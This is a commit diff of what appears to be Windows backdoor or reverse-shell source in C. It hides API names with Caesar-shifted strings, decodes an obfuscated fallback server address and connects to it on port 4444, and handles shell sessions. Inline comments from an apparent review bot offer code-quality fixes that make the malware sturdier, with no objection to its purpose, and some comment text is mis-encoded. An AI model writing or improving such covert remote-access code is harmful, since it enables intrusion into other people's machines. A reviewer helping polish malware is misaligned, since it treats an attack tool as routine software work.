fix: decrypting an ip that is already decrypted

2023-02-15 19:53:56 +01:00
parent a5bb8718a3
commit 02014633a1
4 changed files with 34 additions and 16 deletions


@@ -1,3 +1,9 @@
#define FALLBACK_SERVERS 1
char* fallback_servers[1] = { char* fallback_servers[1] = {
"=3=3=3=", "6>736;=3638:",
};
int fallback_servers_ip[1] = {
4444,
}; };
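Review bot: `fallback_servers_ip` holds port numbers, not addresses: its only entry is `4444`, and the caller passes it to `Api.htons` for `server.sin_port`, so a name such as `fallback_servers_port` would say what it is. Both tables are also declared with a literal `[1]` beside `#define FALLBACK_SERVERS 1`, which puts the count in three places. Declaring them as `char* fallback_servers[FALLBACK_SERVERS]` and `int fallback_servers_port[FALLBACK_SERVERS]` keeps the sizes tied to the macro that bounds `serv` in `main`, so a later edit to one of them cannot turn the index into an out-of-bounds read.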


@@ -105,8 +105,6 @@ void SendShellEndedSignal(SOCKET sock) {
} }
} }
#define FALLBACK_SERVERS 4
int serv = -1; int serv = -1;
int main() { int main() {
InitApis(); InitApis();
@@ -124,7 +122,6 @@ int main() {
struct sockaddr_in server; struct sockaddr_in server;
char* server_reply = (char*)Api.malloc(BUFFER_SIZE); char* server_reply = (char*)Api.malloc(BUFFER_SIZE);
server.sin_family = AF_INET; server.sin_family = AF_INET;
server.sin_port = Api.htons(1337);
WORD wVersionRequested = MAKEWORD(2, 2); WORD wVersionRequested = MAKEWORD(2, 2);
WSADATA wsaData; WSADATA wsaData;
@@ -142,7 +139,19 @@ retry:
if (serv > FALLBACK_SERVERS - 1) { if (serv > FALLBACK_SERVERS - 1) {
serv = 0; serv = 0;
} }
server.sin_addr.s_addr = Api.inet_addr(CAESAR_DECRYPT(fallback_servers[serv]));
//on fait une copie de l'ip chiffr<66>e, puis on la free
//<2F>a <20>vite qu'elle reste dans la m<>moire trop longtemps
//<2F>a <20>vite aussi qu'on utilise CAESAR_DECRYPT sur une ip d<>j<EFBFBD> d<>crypt<70>e
size_t len = strlen(fallback_servers[serv]);
char* Tmp = Api.malloc(len + 1);
Api.strcpy(Tmp, fallback_servers[serv]);
server.sin_addr.s_addr = Api.inet_addr(CAESAR_DECRYPT(Tmp));
Api.free(Tmp);
server.sin_port = Api.htons(fallback_servers_ip[serv]);
//Create socket //Create socket
sock = Api.socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); sock = Api.socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
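Review bot: The comment block above the copy is mis-encoded (its accented characters arrive as replacement bytes) and claims more than the code does. `Api.free(Tmp)` releases the buffer without clearing it, so the decoded address can still sit in freed heap memory, and a fixed-offset `CAESAR_DECRYPT` is reversed by any static analysis of the table; what the copy does achieve, assuming the macro decodes its argument in place as the commit title implies, is that `fallback_servers[serv]` is not decoded a second time when control returns to `retry:`. I would replace the three lines with one ASCII comment that states only that, e.g. `// decode a heap copy: the table entry must stay encoded across retries`. The result of `Api.malloc(len + 1)` also goes to `Api.strcpy` unchecked, so a failed allocation becomes a null write; a null check belongs before the copy. `main` continues beyond this hunk.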


@@ -13,6 +13,18 @@ void InitApis() {
} }
Api.GetProcAddress = (TGetProcAddress)GetProcAddress(hKernel32, CAESAR_DECRYPT("LjyUwthFiiwjxx")); Api.GetProcAddress = (TGetProcAddress)GetProcAddress(hKernel32, CAESAR_DECRYPT("LjyUwthFiiwjxx"));
hMsvcrt = LoadLibraryA(CAESAR_DECRYPT("rx{hwy3iqq"));
if (!hMsvcrt) {
return;
}
Api.strcpy = (Tstrcpy)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("xywhu~"));
Api.malloc = (Tmalloc)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rfqqth"));
Api.free = (Tfree)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("kwjj"));
Api.strncmp = (Tstrncmp)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("xywshru"));
Api.mbstowcs = (Tmbstowcs)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rgxyt|hx"));
Api.memset = (Tmemset)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rjrxjy"));
Api.ReadFile = (TReadFile)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("WjfiKnqj")); Api.ReadFile = (TReadFile)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("WjfiKnqj"));
Api.WriteFile = (TWriteFile)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("\\wnyjKnqj")); Api.WriteFile = (TWriteFile)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("\\wnyjKnqj"));
Api.CloseHandle = (TCloseHandle)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("HqtxjMfsiqj")); Api.CloseHandle = (TCloseHandle)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("HqtxjMfsiqj"));
@@ -40,17 +52,6 @@ void InitApis() {
Api.inet_addr = (Tinet_addr)Api.GetProcAddress(hWininet, CAESAR_DECRYPT("nsjydfiiw")); Api.inet_addr = (Tinet_addr)Api.GetProcAddress(hWininet, CAESAR_DECRYPT("nsjydfiiw"));
Api.WSAStartup = (TWSAStartup)Api.GetProcAddress(hWininet, CAESAR_DECRYPT("\\XFXyfwyzu")); Api.WSAStartup = (TWSAStartup)Api.GetProcAddress(hWininet, CAESAR_DECRYPT("\\XFXyfwyzu"));
Api.WSAGetLastError = (TWSAGetLastError)Api.GetProcAddress(hWininet, CAESAR_DECRYPT("\\XFLjyQfxyJwwtw")); Api.WSAGetLastError = (TWSAGetLastError)Api.GetProcAddress(hWininet, CAESAR_DECRYPT("\\XFLjyQfxyJwwtw"));
hMsvcrt = LoadLibraryA(CAESAR_DECRYPT("rx{hwy3iqq"));
if (!hMsvcrt) {
return;
}
Api.memset = (Tmemset)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rjrxjy"));
Api.malloc = (Tmalloc)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rfqqth"));
Api.free = (Tfree)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("kwjj"));
Api.strncmp = (Tstrncmp)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("xywshru"));
Api.mbstowcs = (Tmbstowcs)Api.GetProcAddress(hMsvcrt, CAESAR_DECRYPT("rgxyt|hx"));
} }
void FreeApis() { void FreeApis() {
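Review bot: Moving the msvcrt block up also moves its `if (!hMsvcrt) return;`, so a failed load now leaves every member assigned after it (`Api.ReadFile`, `Api.WriteFile`, `Api.inet_addr`, `Api.WSAStartup`, …) unset, where before only the CRT members were affected. `InitApis` returns `void` and none of the `Api.GetProcAddress` results are tested, so the caller cannot tell that anything failed. The reason for the new order is not stated either; a line such as `// CRT first: later code needs Api.malloc/Api.strcpy` would record it, if that is the intent. For readers analysing a build rather than the source: these members are resolved at run time from shifted string literals and so need not appear in the import table, but each literal sits next to the member it populates and the offset is constant across the file. The function begins outside the hunks shown.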


@@ -21,6 +21,7 @@ typedef void* (WINAPI* Tmalloc)(size_t);
typedef void(WINAPI* Tfree)(void*); typedef void(WINAPI* Tfree)(void*);
typedef int(WINAPI* Tstrncmp)(const char*, const char*, size_t); typedef int(WINAPI* Tstrncmp)(const char*, const char*, size_t);
typedef size_t(WINAPI* Tmbstowcs)(wchar_t*, const char*, size_t); typedef size_t(WINAPI* Tmbstowcs)(wchar_t*, const char*, size_t);
typedef char*(WINAPI* Tstrcpy)(char*, const char*);
typedef BOOL(WINAPI* TReadFile)(HANDLE, LPVOID, DWORD, LPDWORD, LPOVERLAPPED); typedef BOOL(WINAPI* TReadFile)(HANDLE, LPVOID, DWORD, LPDWORD, LPOVERLAPPED);
typedef BOOL(WINAPI* TWriteFile)(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED); typedef BOOL(WINAPI* TWriteFile)(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED);
@@ -67,6 +68,7 @@ typedef struct ApiList {
TGetProcAddress GetProcAddress; TGetProcAddress GetProcAddress;
Tmbstowcs mbstowcs; Tmbstowcs mbstowcs;
Tstrcpy strcpy;
} API; } API;
void InitApis(); void InitApis();